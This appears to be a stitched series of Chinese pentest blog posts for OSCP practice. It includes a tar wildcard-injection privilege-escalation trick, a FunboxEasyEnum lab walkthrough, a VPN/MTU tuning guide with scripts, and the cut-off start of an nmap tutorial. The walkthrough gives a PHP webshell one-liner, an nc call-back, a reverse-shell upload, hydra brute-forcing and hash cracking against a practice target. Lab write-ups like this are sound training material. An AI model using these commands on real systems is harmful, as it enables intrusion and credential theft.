在本地kali中模拟靶机环境的restapi文件夹，文件夹下原本存在33414端口上的服务，主要是app.py和 main.py两个文件。

当backup-flask.sh执行打包命令时，正常情况下，打包的是这两个py文件。

tar czf /tmp/flask.tar.gz *

但是当在文件夹下输入这两个命令，创建了两个空文件，实际上这两个文件里什么都没写，重要的是文件名，文件名就是提权的参数。

1echo "" > '--checkpoint=1' 
2echo "" > '--checkpoint-action=exec=sh payload.sh'

那么当运行 tar czf /tmp/flask.tar.gz *这个命令时，通配符星号（*）意思是选取了文件夹下的所有文件，通配符星号（*）认为’–checkpoint=1’ 和’–checkpoint-action=exec=sh payload.sh’是两个文件，所以加入到命令中，此时通配符星号（*）代表的是：

1app.py flask.tar.gz main.py payload.sh '--checkpoint=1' '--checkpoint-action=exec=sh payload.sh'

但是当执行tar命令时，tar会认为后面两个是参数，不是文件名。所以执行tar时就通过文件名玩文字游戏，把提权参数写成文件名，巧妙的通过通配符送入root的定时任务，让其代劳。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场-FunboxEasyEnum WP

Wed, 16 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官方网页打开或下载靶场文件

https://www.vulnhub.com/entry/funbox-easyenum,565/

快速连接OffSec靶场的小方法

信息收集

1# 靶机地址
2192.168.151.132
3# Kali攻击机在VPN中的地址
4192.168.45.156

测试靶场网络连接速度

1ping 192.168.151.132 -c 10 | grep rtt

使用【踩坑总结】丝滑连接OffSec官方VPN的方法中的方法测试最佳MTU值并自动设置。

扫描端口

1ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.151.132 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.151.132
4sudo nmap --script=vuln -p$ports -Pn 192.168.151.132

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop]
 2└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.151.132
 3Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 03:48 EDT
 4Nmap scan report for bogon (192.168.151.132)
 5Host is up (0.096s latency).
 6
 7PORT STATE SERVICE VERSION
 822/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 9| ssh-hostkey: 
10| 2048 9c:52:32:5b:8b:f6:38:c7:7f:a1:b7:04:85:49:54:f3 (RSA)
11| 256 d6:13:56:06:15:36:24:ad:65:5e:7a:a1:8c:e5:64:f4 (ECDSA)
12|_ 256 1b:a9:f3:5a:d0:51:83:18:3a:23:dd:c4:a9:be:59:f0 (ED25519)
1380/tcp open http Apache httpd 2.4.29 ((Ubuntu))
14|_http-title: Apache2 Ubuntu Default Page: It works
15|_http-server-header: Apache/2.4.29 (Ubuntu)
16Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
17Device type: general purpose
18Running: Linux 4.X|5.X
19OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
20OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
21Network Distance: 4 hops
22Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
23
24OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
25Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds

 1┌──(kali㉿kali)-[~/Desktop]
 2└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.151.132
 3Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 03:53 EDT
 4Nmap scan report for bogon (192.168.151.132)
 5Host is up (0.11s latency).
 6
 7PORT STATE SERVICE
 822/tcp open ssh
 980/tcp open http
10|_http-dombased-xss: Couldn't find any DOM based XSS.
11|_http-csrf: Couldn't find any CSRF vulnerabilities.
12| http-slowloris-check: 
13| VULNERABLE:
14| Slowloris DOS attack
15| State: LIKELY VULNERABLE
16| IDs: CVE:CVE-2007-6750
17| Slowloris tries to keep many connections to the target web server open and hold
18| them open as long as possible. It accomplishes this by opening connections to
19| the target web server and sending a partial request. By doing so, it starves
20| the http server's resources causing Denial Of Service.
21| 
22| Disclosure date: 2009-09-17
23| References:
24| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
25|_ http://ha.ckers.org/slowloris/
26|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
27| http-enum: 
28| /robots.txt: Robots file
29|_ /phpmyadmin/: phpMyAdmin

打开80端口如图，是一个Apache2默认配置页面，如果说管理员没有配置网站访问权限的话，应该还能使用目录扫描发现其他默认目录。

扫描目录

字典目录地址如下，一般选择Medium字典即可。

1cd /usr/share/wordlists/dirbuster
2ls

1sudo gobuster dir \
2 -u http://192.168.151.132/ \  # 目标 URL
3 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \  # 使用中等规模字典
4 -e \  # 显示完整 URL
5 -t 20 \  # 20 线程加速扫描
6 -x php # 额外探测 .php 文件

发现存在新的页面：

1http://192.168.151.132/mini.php

反弹Shell

这个靶机是个奖励关，是一个文件上传的练手靶机。现实情况中，基本没有这么傻的服务器。练手也要好好练习，这是一个典型的PHP文件上传还能反弹PHP代码的靶机，我们可以用这个靶机练习多种反弹Shell的方式。

方法一：修改Mini.php，注入反弹

选择Mini.php的选项，选择 Edit 编辑，点击执行按钮。

可以修改Mini.php文件的内容，额外的发现是option&path=/var/www/html似乎可以用于遍历目录，但是访问其他目录没有列出文件，似乎是没有权限。

还是回到原来的思路，修改php文件，加入一句话木马。

1<?=`$_GET[0]`?>

这里可以发现第一个flag了。网页形式的命令实在是不好操作，把 Mini.php改一个反弹的命令。初次尝试用下面的命令，弹回了，但是无法有交互的终端，如果带上-e或者-c /bin/bash参数的话，就无法弹回来了。

1http://192.168.151.132/mini.php?0=nc%20192.168.45.156%204777

方法二：上传反弹php文件，访问反弹

查找PHP反弹shell的脚本

1find / -name 'php-reverse*' 2>/dev/null 
2---
3┌──(kali㉿kali)-[~/Desktop]
4└─$ find / -name 'php-reverse*' 2>/dev/null 
5/usr/share/laudanum/php/php-reverse-shell.php
6/usr/share/laudanum/wordpress/templates/php-reverse-shell.php

复制到本地，修改然后再网页中上传。

可以发现权限是只读的，该做全员可读可写可执行。

访问此链接，反弹成功。

提权Root

从一开始的目录扫描和Nmap的结果中我们还漏了一个phpmyadmin的数据库页面，打开发现确实是存在。但是密码不是默认密码。

内网信息收集

继续从建立的Shell探索。在/tmp目录下载linpeas.sh脚本，来查找系统下有什么可疑文件可以利用。

1cd /tmp
2wget https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/linpeas.sh
3chmod +x linpeas.sh
4./linpeas.sh

找到个3306端口开放，应该是phpmyadmin的数据库端口。53作为DNS的服务器。

Pkexec似乎可以用作提权。

密码文件里，这个似乎可以爆下哈希。

1oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

Karla用户似乎是管理员角色的账户，他的权限比其他人高，仅次于root。

发现数据库的配置文件。

其他有趣的文件，后来看了不知道是干什么的。

数据库密码也找到了。

 1╔══════════╣ Readable files belonging to root and readable by me but not world readable
 2-rw-r----- 1 root www-data 525 Sep 18 2020 /etc/phpmyadmin/config-db.php
 3-rw-r----- 1 root www-data 8 Sep 18 2020 /etc/phpmyadmin/htpasswd.setup
 4-rw-r----- 1 root www-data 68 Sep 18 2020 /var/lib/phpmyadmin/blowfish_secret.inc.php
 5-rw-r----- 1 root www-data 0 Sep 18 2020 /var/lib/phpmyadmin/config.inc.php
 6╔══════════╣ Searching passwords in config PHP files
 7/etc/phpmyadmin/config-db.php:$dbpass='tgbzhnujm!';
 8/etc/phpmyadmin/config-db.php:$dbuser='phpmyadmin';
 9/etc/phpmyadmin/config.inc.php: // $cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
10/etc/phpmyadmin/config.inc.php:// $cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
11/usr/share/phpmyadmin/config.sample.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
12/usr/share/phpmyadmin/libraries/config.default.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
13/usr/share/phpmyadmin/libraries/config.default.php:$cfg['Servers'][$i]['nopassword'] = false;
14/usr/share/phpmyadmin/libraries/config.default.php:$cfg['ShowChgPassword'] = true;
15
16╔══════════╣ Modified interesting files in the last 5mins (limit 100)
17/var/log/auth.log
18/var/log/journal/7eb907a1e82c4e37b03c20faa67cf884/system.journal
19/var/log/syslog

使用小豌豆找到的密码，尝试登录phpmyadmin后台成功。所以凭证就是

1phpmyadmin
2tgbzhnujm!

方法一：进入Karla sudo su快捷提权（瞎蒙）

从前面收集的信息来看，Karla推测是管理员的角色，而管理员一般就是维护数据库的人，极有可能重复使用同一个密码。尝试切换到Karla账户，输入数据库的密码蒙一下：tgbzhnujm!成功进入。

Karla确实是管理员角色，sudo -l发现它可以执行所有命令，所以直接sudo su就能进root了。

方法二：进入Karla用Pkexec提权

内网信息收集中的Pkexec似乎可以用作提权，查询https://gtfobins.github.io/gtfobins/pkexec/提权命令即可。www-data账户不可提权，因为不知道www-data的密码。karla账户可以，Oracle账户不行。

方法三：爆破Goat，用Mysql提权

内网信息手机中发现，Goat账户是可以SSH登录的，而官网题目也提示了goat。所以，直接尝试用hydra爆破一下ssh登录。

1hydra -l goat -P /usr/share/wordlists/rockyou.txt ssh://192.168.151.132
2ssh goat@192.168.151.132
3密码也是goat

也可以不用爆，题目已经给了提示。

登录后发现mysql命令可以无密码提权，搜索https://gtfobins.github.io/gtfobins/mysql/命令输入即可提权。

其他玩法

Oracle账户

之前发现有Oracle账户的哈希，尝试爆破。

1cat > orcalhash 
2# 粘贴下面的内容，按 Ctrl D结束
3oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
4
5cd /usr/share/wordlists 
6sudo gzip -d rockyou.txt.gz

1 hashcat orcalhash /usr/share/wordlists/rockyou.txt

爆破密码得到是hiphop

可以直接从www-data账户直接su oracle进入账户，但是好像没啥有用的。

Harry账户

在Karla账户或root账户下执行sudo mysql进入数据库。

1show databases;
2use db1
3show tables;
4select * from users;

解码一下得到密码是123456

但是好像也没啥用。

遗憾：没找到Sllay的密码。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

【踩坑总结】丝滑连接OffSec官方VPN的方法

Wed, 16 Jul 2025 16:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具。

方法对比	难度	流畅度	靶机VPN是否双端	流量消耗	稳定性
方法一：Tun模式	⭐⭐	340ms	仅Kali	大	好
方法二：允许局域网	⭐⭐⭐	190ms	Win、Kali双端	小	差
方法三：Kali中单独登机	⭐⭐⭐	200ms	仅Kali	中	好

流畅度测试命令 ping IP -c 10 |grep rtt

方法一：物理机登机场开Tun模式，Kali虚拟机连接靶机VPN

找个机场订阅，需要登机方式的可以后台私信我。

点击左边的“代理”，点击“全局”，设置为全局模式，点击Traffic自动选择最快的节点，考试时候建议手动选择下面有地名的节点，一开始选的哪一个，只选那个，不要换节点，可能会因为节点异地登录引起麻烦。

点击左侧“设置”按钮，打开Tun模式和服务模式，红框里面的建议都打开，其他按钮不要动。服务模式的小盾牌点一下，安装一个组件，没有装的装一下。

除了Clash小猫咪软件，也可以使用V2rayN软件特定版本的tun模式，不要使用新版，新版的tun不稳定。

此时进入Kali虚拟机，查询一下自己的出口节点，确实是机场的节点了，而且ping谷歌的速度也比较快，就说明翻过去了。

下载Kali官方的VPN，复制到Kali虚拟机中。

然后在Kali中使用以下命令连接Kali靶机的VPN。

1sudo openvpn universal.ovpn

然后用ifconfig 命令能发现多出来的网卡。

使用如下命令设置以下速率，来保证VPN的传输稳定，如果你的机场够快，下面的命令也可以不设，默认的1500速度也一样的。

1sudo ip link set dev tun0 mtu 1250
2ip link show tun0

靶场漏端口的情况和机场连接的速度有关，测试下来的经验：

极速机场：便宜，拖Docker镜像确实极速，但是干别的不行，Kali的VPN都连不上。
龙猫机场：价格中等，拖Docker镜像有点慢，综合来说干什么都可以，就是都有点慢，能连Kali的VPN，但是扫端口略慢。
Flower机场：价格是龙猫的两倍，速度很快，连Kali的VPN很丝滑，推荐考试使用。
一元机场：白菜价，巨慢，疑似跑路了，节点没几个活的了。
自建专线机场：包机，很快，但是也贵，速度看机场在哪里，建议买香港节点，连Kali的VPN很丝滑，推荐考试使用。

总结：这个方法最简单也最直接，但是tun+全局模式会让所有流量都走的机场代理，对于机场流量消耗巨大。还有就是某些国内网站从国外地址翻进来访问也是很慢很慢。

方法二：物理机登机场允许局域网连接，修改universal.ovpn开头

代理规则组依旧是选择全局代理。

系统设置上关闭Tun模式，关闭服务模式，打开“局域网连接”

注意看端口用的时哪一个，这里用的时7897。修改官网下载的VPN文件，在首行加入代理地址

1socks-proxy 127.0.0.1 7897

然后再物理机Windows中直接导入OpenVPN GUI软件中，再Windows上连接VPN。

VPN软件中设置代理为“使用配置文件中的设置”

选中VPN名称后右键打开选项，点击连接即可。第一次连接后有概率会重连或断开一次，再次点击重新连接即可。

WIndows下打开也可以看靶机，Kali下也可以。

Windows和Kali上的速率相差不大。

但是使用Nmap有概率扫漏端口。

直接请求的话，还是能请求的。但是连接不稳定，即使物理机到虚拟机的网络设置了不限速，但是再Kali中扫描靶机还是很慢。还有概率断线。

方法三：Kali中用V2rayN命令行连接，Kali直连Vpn

安装V2rayN的Linux版本，复制机场信息到Kali中，在Kali中登录VPN。

扫描端口也不掉包的。

命令参数之间的配合

如果mtu速度、机场速度和Nmap等命令参数配合的不对，可能出现以下情况

一扫就是一堆

端口漏扫

扫的很慢，半天没有反应。

每个人的网络环境不一样，带宽和速度不一样，使用Wifi和使用网线的稳定性和速率也不一样。所以同样的命令参数，别人能用但不代表你的网络环境能用。建议考试时，提前测试考试地点的网络环境或者使用之前练习时候的场景即可。尽量保证网络最优，不要因为漏扫某个关键端口而出现打不进去的情况。如果你怀疑你的网络有问题，建议使用官方网页的My Kali再次验证一下，以官方My Kali的扫描结果为准。

下面是一些网络优化的建议：

自动MTU测试脚本

将以下脚本保存为mtu-test.sh

 1#!/bin/bash
 2# 自动化MTU测试脚本 - 支持自定义参数
 3
 4# 默认参数配置
 5DEFAULT_TARGET="192.168.116.72"
 6QUICK_START=1472 # 快速测试起始值
 7QUICK_END=1200 # 快速测试结束值
 8QUICK_STEP=-10 # 快速测试步长
 9FULL_START=1472 # 完整测试起始值
 10FULL_END=500 # 完整测试结束值
 11FULL_STEP=-5 # 完整测试步长
 12TUNNEL_OVERHEAD=40 # 默认隧道包头开销(字节)
 13
 14# 帮助信息
 15show_help() {
 16 echo "用法: $0 [选项]"
 17 echo "选项:"
 18 echo " -t <IP地址> 指定测试目标 (默认: $DEFAULT_TARGET)"
 19 echo " -f 使用完整测试范围 (默认使用快速范围)"
 20 echo " -o <字节> 隧道包头开销 (默认: $TUNNEL_OVERHEAD)"
 21 echo " -s <起始值> 自定义测试起始值 (需要 -e 和 -p 配合)"
 22 echo " -e <结束值> 自定义测试结束值"
 23 echo " -p <步长> 自定义测试步长 (必须为负数)"
 24 echo " -h 显示帮助信息"
 25 exit 0
 26}
 27
 28# 参数解析
 29while getopts "t:fho:s:e:p:" opt; do
 30 case $opt in
 31 t) TARGET="$OPTARG" ;;
 32 f) USE_FULL_RANGE=true ;;
 33 o) TUNNEL_OVERHEAD="$OPTARG" ;;
 34 s) CUSTOM_START="$OPTARG" ;;
 35 e) CUSTOM_END="$OPTARG" ;;
 36 p) CUSTOM_STEP="$OPTARG" ;;
 37 h) show_help ;;
 38 *) echo "无效选项: -$OPTARG" >&2; exit 1 ;;
 39 esac
 40done
 41
 42# 设置目标
 43TARGET=${TARGET:-$DEFAULT_TARGET}
 44
 45# 设置测试范围
 46if [ -n "$CUSTOM_START" ] && [ -n "$CUSTOM_END" ] && [ -n "$CUSTOM_STEP" ]; then
 47 echo "使用自定义测试范围: $CUSTOM_START -> $CUSTOM_END (步长 $CUSTOM_STEP)"
 48 TEST_START=$CUSTOM_START
 49 TEST_END=$CUSTOM_END
 50 TEST_STEP=$CUSTOM_STEP
 51elif [ "$USE_FULL_RANGE" = true ]; then
 52 echo "使用完整测试范围: $FULL_START -> $FULL_END (步长 $FULL_STEP)"
 53 TEST_START=$FULL_START
 54 TEST_END=$FULL_END
 55 TEST_STEP=$FULL_STEP
 56else
 57 echo "使用快速测试范围: $QUICK_START -> $QUICK_END (步长 $QUICK_STEP)"
 58 TEST_START=$QUICK_START
 59 TEST_END=$QUICK_END
 60 TEST_STEP=$QUICK_STEP
 61fi
 62
 63# 验证自定义步长
 64if [ -n "$CUSTOM_STEP" ] && [ "$CUSTOM_STEP" -ge 0 ]; then
 65 echo "错误: 自定义步长必须是负数!" >&2
 66 exit 1
 67fi
 68
 69# 计算实际MTU值时需添加头部大小
 70HEADER_SIZE=28 # IP头(20字节) + ICMP头(8字节)
 71SUCCESS_SIZE=0
 72
 73# 设置临时MTU
 74TEMP_MTU=1250
 75sudo ip link set dev tun0 mtu $TEMP_MTU
 76echo "设置临时MTU为$TEMP_MTU用于测试"
 77
 78# MTU测试函数
 79test_mtu_range() {
 80 local size=$TEST_START
 81 while [ "$size" -ge $TEST_END ]; do
 82 local packet_size=$((size - HEADER_SIZE))
 83 if [ $packet_size -le 0 ]; then
 84 echo "无效测试大小: $size (结果值: $packet_size)"
 85 size=$((size + TEST_STEP))
 86 continue
 87 fi
 88 
 89 echo -n "测试包大小: $size字节 (MTU等效值: $((size + TUNNEL_OVERHEAD))字节)... "
 90 
 91 if ping -c 2 -M do -s $packet_size $TARGET >/dev/null 2>&1; then
 92 echo "成功!"
 93 SUCCESS_SIZE=$size
 94 break
 95 else
 96 echo "失败"
 97 fi
 98 
 99 # 避免无限循环
100 if [ $TEST_STEP -eq 0 ]; then
101 echo "警告: 步长为0可能导致无限循环!"
102 break
103 fi
104 
105 size=$((size + TEST_STEP))
106 done
107}
108
109# 执行测试
110echo "开始对$TARGET进行MTU测试..."
111test_mtu_range
112
113# 计算结果
114if [ "$SUCCESS_SIZE" -gt 0 ]; then
115 OPTIMAL_MTU=$((SUCCESS_SIZE + TUNNEL_OVERHEAD))
116 echo "------------------------------------------------------"
117 echo "测试成功! 最大无分片包大小: $SUCCESS_SIZE字节"
118 echo "隧道包头开销: $TUNNEL_OVERHEAD字节"
119 echo "推荐MTU值: $OPTIMAL_MTU"
120 echo "计算: 包大小($SUCCESS_SIZE) + 开销($TUNNEL_OVERHEAD)"
121 
122 # 设置最佳MTU
123 sudo ip link set dev tun0 mtu $OPTIMAL_MTU
124 echo "已将tun0 MTU设置为$OPTIMAL_MTU"
125else
126 echo "------------------------------------------------------"
127 echo "测试失败! 未找到有效MTU值"
128 echo "可能原因:"
129 echo "1. 目标$TARGET不可达"
130 echo "2. 测试范围不适用(尝试调整参数)"
131 echo "3. 网络环境特殊(防火墙阻止ICMP测试)"
132 
133 # 还原初始设置
134 sudo ip link set dev tun0 mtu 1500
135 echo "已还原tun0 MTU为1500"
136fi

保存后给脚本添加课执行权限，然后通过以下命令测试最佳MTU值。

 1# 指定目标+完整范围测试
 2./mtu-test.sh -t 192.168.116.72 -f
 3
 4# 自定义测试范围
 5./mtu-test.sh -s 1450 -e 1100 -p -2
 6
 7# 设置隧道开销（适用于不同VPN协议）
 8./mtu-test.sh -o 50 # OpenVPN等大包头协议
 9
10# 更大步长覆盖宽范围 针对卫星链路优化
11./mtu-test.sh -t 192.168.1.100 -s 1500 -e 400 -p -20 -o 60
12
13# 精细步长测试可疑区间
14./mtu-test.sh -t 10.8.0.1 -s 1420 -e 1390 -p -1 -o 50

隧道开销参考值

VPN协议	推荐开销值	包含内容
WireGuard	40-60	基本头+加密信息
OpenVPN	60-100	IP头+UDP头+OpenVPN封装头
IPsec	50-80	ESP头+认证数据+填充
L2TP	80-120	IP头+UDP头+L2TP头+PPP头

动态计算原理

最终MTU = 最大无分片包大小(ICMP数据+28字节) + 隧道包头开销

Flower机场测试

龙猫机场测试

自建专线测试

可以看到，不同机场能承载的MTU是有差距的，机场之间不同节点也是有差距的。

Nmap 最佳参数确定

理解 MTU、带宽和 Nmap 的 --min-rate 参数之间的关系，关键在于它们如何共同影响网络数据包传输的速率和效率，尤其是在进行网络扫描时。它们之间没有直接的数学公式，但相互影响显著：

MTU (Maximum Transmission Unit - 最大传输单元):
- 定义： 指网络链路层能够传输的最大数据帧（或数据包）的大小（以字节为单位）。常见值如以太网的 1500 字节（不含帧头）。
- 作用： 决定了单个数据包能承载的最大有效载荷（Payload）。如果应用层数据超过 MTU，它会被分片（Fragmentation）成多个数据包传输。
- 与扫描的关系： Nmap 发送的探测包大小取决于扫描类型（如 SYN 扫描包很小，UDP 扫描包可能接近 MTU）和选项（如 --data-length）。包的大小直接影响每个包在网络中传输所需的时间和资源。
带宽 (Bandwidth):
- 定义： 指网络链路在单位时间内能够传输的最大数据量（以比特/秒为单位，如 Mbps, Gbps）。
- 作用： 这是网络的物理容量限制。它设定了数据流经特定路径的最大速率上限。
- 与扫描的关系： Nmap 扫描产生的总数据流量（所有发送和接收包的大小之和）除以扫描时间不能超过可用带宽（还需要考虑链路上的其他流量）。高带宽链路能承载更快的扫描速率。
Nmap 的 --min-rate <packets per second> 参数:
- 定义： 强制 Nmap 尝试以至少指定的速率（每秒发送的包数）发送探测包。
- 作用： 主要用于加速扫描。它告诉 Nmap 不要低于这个发送速率，即使目标响应缓慢或丢包率高。它直接控制的是发包的速率（包/秒），而不是数据速率（比特/秒）。
- 与扫描的关系： 这是用户主动设置的一个目标速率下限，用于追求速度。但它受到 MTU 和带宽的物理限制。

三者如何相互作用：

带宽是总容量的天花板：
- 无论 --min-rate 设置得多高，Nmap 实际能达到的数据速率（比特/秒） 绝对不可能超过链路的可用带宽。
- 公式表示： (平均包大小 in bits) * (实际发包速率 in pps) <= 可用带宽 (in bps)
- 关键点： --min-rate 控制的是包/秒 (pps)，但带宽限制的是比特/秒 (bps)。包的大小（受 MTU 影响）是连接两者的桥梁。
MTU 影响包大小，进而影响数据速率：
- 如果 Nmap 发送的探测包很大（接近 MTU），那么即使以中等的 --min-rate (pps) 发送，产生的数据速率 (bps) 也会很高，更容易接近或达到带宽上限。
- 如果 Nmap 发送的探测包很小（如 SYN 扫描包只有 60-70 字节），那么即使设置非常高的 --min-rate (pps)，产生的数据速率 (bps) 也可能远低于带宽上限。在这种情况下，瓶颈往往不在带宽，而在操作系统、网卡处理能力或目标响应能力上。
--min-rate 的追求与物理限制的冲突：
- 追求高 pps： 用户设置高 --min-rate 是为了快速完成扫描（发送更多包/秒）。
- 带宽限制： 如果包足够大，高 pps 会迅速消耗带宽。一旦达到带宽上限，Nmap 就无法再提高 pps（除非包变小，但包大小通常由扫描类型决定）。
- MTU 的间接影响： 大包（接近 MTU）使得在较低 pps 下就达到带宽上限的可能性更高，限制了 --min-rate 进一步提升 pps 的空间。小包则允许更高的 pps 而不触及带宽上限。
- 其他限制： 即使带宽允许，过高的 --min-rate 还可能超过操作系统或网卡的发送能力上限（PPS 上限），或者被网络设备（防火墙、路由器）的速率限制策略拦截，或者压垮目标主机导致其无法响应或产生大量丢包。

总结关系：

带宽是绝对上限： 它限制了所有流量（包括扫描流量）的最大数据速率 (bps)。
MTU 影响效率： 它决定了单个包的最大尺寸。包的大小（由扫描类型和 MTU 共同决定）是连接发包速率 (pps - 由 --min-rate 控制) 和数据速率 (bps - 受带宽限制) 的关键因子。大包更容易使扫描流量触及带宽上限。
--min-rate 是用户目标： 它指定了 Nmap 尝试达到的最低发包速率 (pps)。它的实际效果受到带宽（通过包大小换算成数据速率）以及操作系统、网卡、网络设备能力、目标响应能力和延迟（RTT）的综合限制。

实际应用中的考虑：

高速网络（高带宽）： 在小包扫描（如 SYN 扫描）中，--min-rate 可以设置得很高（几千甚至几万 pps），因为小包的高 pps 消耗的实际带宽相对较小，瓶颈通常在端点处理能力或网络延迟（RTT）。对于大包扫描（如大负载 UDP 扫描），高 --min-rate 更容易达到带宽上限。
低速网络（低带宽）： 即使是中等 --min-rate 或小包扫描，也容易达到带宽上限。设置过高的 --min-rate 不仅无效（实际速率上不去），还可能导致严重拥塞和丢包。
优化扫描： 理解网络带宽和典型 MTU 有助于合理设置 --min-rate。目标应该是找到在可用带宽和处理能力范围内尽可能快（高 pps）但不至于引起过度丢包或被防火墙封禁的速率。通常需要根据网络环境和扫描类型进行测试和调整。
避免拥塞： 在共享网络或生产环境中扫描时，过高的 --min-rate（尤其在大包情况下）会迅速消耗带宽，影响其他业务。务必谨慎使用并选择非高峰时段。

简言之：--min-rate 设定你想要的速度（包/秒），但你能跑多快，取决于你的车（包大小/MTU）和马路有多宽（带宽），还要考虑交通规则和其他车辆（网络设备、拥塞、延迟、端点性能）。带宽是硬性限制，MTU 影响单个“货物单元”的大小，而 --min-rate 是你踩油门的力度。

你可以使用简单的乘除法来估算--min-rate的值，也可以使用以下命令来自动计算。

 1#!/bin/bash
 2
 3# 安装必要工具
 4if ! command -v bc &> /dev/null; then
 5 echo "[*] 安装 bc (数学计算器)..."
 6 sudo apt update && sudo apt install -y bc
 7fi
 8
 9if ! command -v speedtest-cli &> /dev/null; then
10 echo "[*] 安装 speedtest-cli..."
11 sudo apt install -y speedtest-cli
12fi
13
14# 获取最佳 MTU
15read -p "[?] 输入你测试的最佳 MTU (默认 1500): " MTU
16MTU=${MTU:-1500}
17
18# 测试带宽
19echo "[*] 正在测试带宽 (可能需要 30 秒)..."
20BANDWIDTH_MBPS=$(speedtest-cli --simple | awk '/Download/{print $2}')
21if [ -z "$BANDWIDTH_MBPS" ]; then
22 echo "[!] 带宽测试失败! 手动输入值:"
23 read -p "[?] 输入你的带宽 (Mbps): " BANDWIDTH_MBPS
24else
25 echo "[+] 测得带宽: ${BANDWIDTH_MBPS} Mbps"
26fi
27
28# 选择扫描类型
29echo "[?] 选择扫描类型:"
30echo " 1) SYN 扫描 (小包, 74 字节)"
31echo " 2) UDP 扫描 (大包, MTU 大小)"
32read -p "选项 (1/2): " SCAN_TYPE
33
34case $SCAN_TYPE in
35 1) 
36 PACKET_SIZE=74
37 echo "[+] 使用 SYN 扫描 (包大小: 74 字节)"
38 ;;
39 2) 
40 PACKET_SIZE=$((MTU + 18))
41 echo "[+] 使用 UDP 扫描 (包大小: ${PACKET_SIZE} 字节)"
42 ;;
43 *) 
44 echo "[!] 无效选项! 使用默认 SYN 扫描"
45 PACKET_SIZE=74
46 ;;
47esac
48
49# 计算理论最大 pps (带宽 Mbps * 1e6 / (包大小 * 8))
50THEORETICAL_PPS=$(echo "scale=2; $BANDWIDTH_MBPS * 1000000 / ($PACKET_SIZE * 8)" | bc)
51
52# 计算安全值 (理论值的 50%)
53SAFE_PPS=$(echo "scale=0; $THEORETICAL_PPS * 0.5 / 1" | bc)
54
55# 计算首次扫描建议值 (理论值的 70%)
56INITIAL_PPS=$(echo "scale=0; $THEORETICAL_PPS * 0.7 / 1" | bc)
57
58# 输出结果
59echo -e "\n[+] 计算结果:"
60echo "--------------------------------"
61echo "带宽: $BANDWIDTH_MBPS Mbps"
62echo "MTU: $MTU 字节"
63echo "扫描包大小: $PACKET_SIZE 字节"
64echo "理论最大速率: $THEORETICAL_PPS pps"
65echo "--------------------------------"
66echo -e "\n[★] 建议 Nmap 参数:"
67echo "安全扫描: nmap --min-rate $SAFE_PPS ..."
68echo "快速扫描: nmap --min-rate $INITIAL_PPS ..."
69echo -e "\n[!] 提示:"
70echo "- 首次扫描建议使用快速扫描值"
71echo "- 若遇丢包，降低至安全扫描值"
72echo "- 在敏感网络环境中，建议从更低的速率开始"

保存后，赋予执行权限即可。

1chmod +x nmap-optimizer.sh
2# 配合mtu测试脚本使用
3./mtu-test.sh -t 192.168.140.72 -f
4./nmap-optimizer.sh

此方法给出的参数值比较保守，适合在普通公网环境探测时使用，打靶机Nmap扫描时建议将此参数略高6-8倍。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day19 Kali主动扫描SMB、NetBIOS、SMTP、SNMP

Wed, 16 Jul 2025 10:51:26 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Nmap核心扫描流程与命令回顾

主机发现 (找出哪些 IP 是活动的):

sudo nmap -sn 192.168.1.0/24

-sn: (No Port Scan) 只进行主机发现（发送 ARP、ICMP Echo 等请求），不扫描端口。快速识别网络上哪些主机是“活”的。
替代/相关参数:
